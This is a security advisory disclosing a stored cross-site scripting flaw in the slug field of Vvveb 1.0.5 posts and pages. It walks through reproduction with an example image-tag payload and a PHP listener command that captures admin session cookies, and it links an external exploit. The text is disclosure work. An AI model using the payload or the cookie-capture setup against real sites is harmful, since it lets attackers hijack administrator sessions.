| Type | software | 
| Product Environment | web | 
| Product Name | Vvveb | 
| Product Vendor | givanz | 
| Product Version | 1.0.5 | 
| Product Link | https://github.com/givanz/Vvveb | 
| Vulnerability Name | Cross-Site Scripting | 
| Severity | High | 
| CVSS String | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N | 
| CVSS Score | 8.7 | 
| CVE ID | CVE-2025-8975 | 
| Vendor Acknowledgement | Yes | 
| Affected digital Assets | 268 | 
| Affected Users | 26800 | 
| Date of Reporting | Jan 03, 2025 | 
| PoC Exploit | https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd | 
| Credit | 0xhamy | 
Vvveb 1.0.5 is vulnerable to authenticated stored XSS during creation/editing of posts and pages.
The slug parameter for content at:
/vadmin123/index.php?module=content/post&type=post/vadmin123/index.php?module=content/posts&type=pageEditors can insert HTML into the slug (e.g., via post or page edit forms). The application persists this value and reuses it in multiple admin contexts (standard edit page, and the visual “drag and drop” designer).
Because the payload is stored and auto-rendered in privileged admin views, any moderator/admin who opens the affected item triggers execution—often without the payload being visible—allowing cookie/session exfiltration and authenticated API actions.
Open post/page listings.
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page
Edit a specific item.
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page
Inject a payload into the slug and save.
Example payload:
"><img src="http://127.0.0.1:1718/capture.php">
Trigger via normal edit view.
Reload the edited item (or have another moderator/admin click it from the list—the UI opens directly in edit mode), e.g.:
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
The payload executes on load.
Trigger via drag-and-drop designer.
Opening the page in the visual editor also executes the stored payload:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend
(The designer autoloads the stored slug into the UI, executing the payload even if it’s not visibly displayed.)
(Optional) Verify exfiltration.
Use the cookie-capture PHP from your gist (capture.php), start a listener:
php -S 0.0.0.0:1718
Observe inbound requests and captured session cookies when admins/moderators open affected items.
img-src/connect-src to trusted domains).